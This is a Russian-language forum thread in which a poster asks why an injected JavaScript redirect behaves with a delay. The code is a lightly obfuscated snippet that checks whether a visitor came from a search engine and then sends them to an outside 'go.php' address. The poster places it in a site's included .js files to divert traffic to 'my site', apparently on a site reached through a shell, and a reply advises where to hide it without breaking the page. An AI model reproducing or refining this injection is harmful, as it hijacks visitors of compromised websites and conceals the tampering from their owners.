Добрый день форумчане. Поясните пожалуйста по java-редиректу. Задача: поставить ява-редирект вида Code: function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!=-1||Ref.indexOf('.bing.')!=-1||Ref.indexOf('.yahoo.')!=-1||Ref.indexOf('.aol.')!=-1||Ref.indexOf('.ask.')!=-1||Ref.indexOf('.altavista.')!=-1||Ref.indexOf('.yandex.')!=-1){document.write('<script language="javascript">docu'+'ment.location="http://xxx.ru/go.php?sid=1"</s'+'cript>')}else{document.write('.')}}R(); в .js файл, который подключается на главной странице. Посчитал что такой способ сокрытия ифрейма самый действенный. Что получилось: код вставил, но вчера он у меня работать никак не хотел. Если вставлять код в тегах <script> на главной странице, то все работает, значит код рабочий. Вставлял в разные ява файлы, нигде работать не хотел. Сегодня с утра захожу - работает! Я обрадовался, давай искать где сработал. Удалял по одному из разных файлов, ожидая что работать перестанет. В итоге удалил все коды - а редирект продолжает работать! Вопрос: собственно как так? Ява скрипты что, работают с суточным запозданием? Поясните если не сложно. P.S>скрипты действительно все удалил, проверял поиском в шелле, скриптов нет. но работает...
Вставь код в один из скриптов, что подключается на страницах, в то место, где он точно не нарушит логику работы основного JS скрипта. Переходи с поисковиков при тесте и очисти кэш браузера)
Вчера специально чтобы перебрасывало на yandex.ru, вчера весь день не перебрасывало, сегодня перебрасывает. Сейчас только что спецом установил отдельный браузер почистил все куки - все равно та же песня. Ну да ладно, главное код срабатывает, правда непонятно почему все начинает работать на сутки позже. Еще вопрос, если не сложно - при срабатывании кода, сначала загружается сайт на котором стоит код, а только потом уже переброс на мой сайт. Это нормально? Пауз в коде не выставлял, да и сам код пихаю в начало первого ява скрипта. По идее все должно быть максимально быстро. Не сложно пояснить что вы имели ввиду? Гугл скудно отвечает что Java и Javasript не одно и тоже, на этом разъяснения заканчиваются. Не очень понял как это поможет моей ситуации P.S>покопался еще, я так понимаю с помощью данной команды мы можем указать системе что Ява и Ява скрипт должны быть одним и тем же?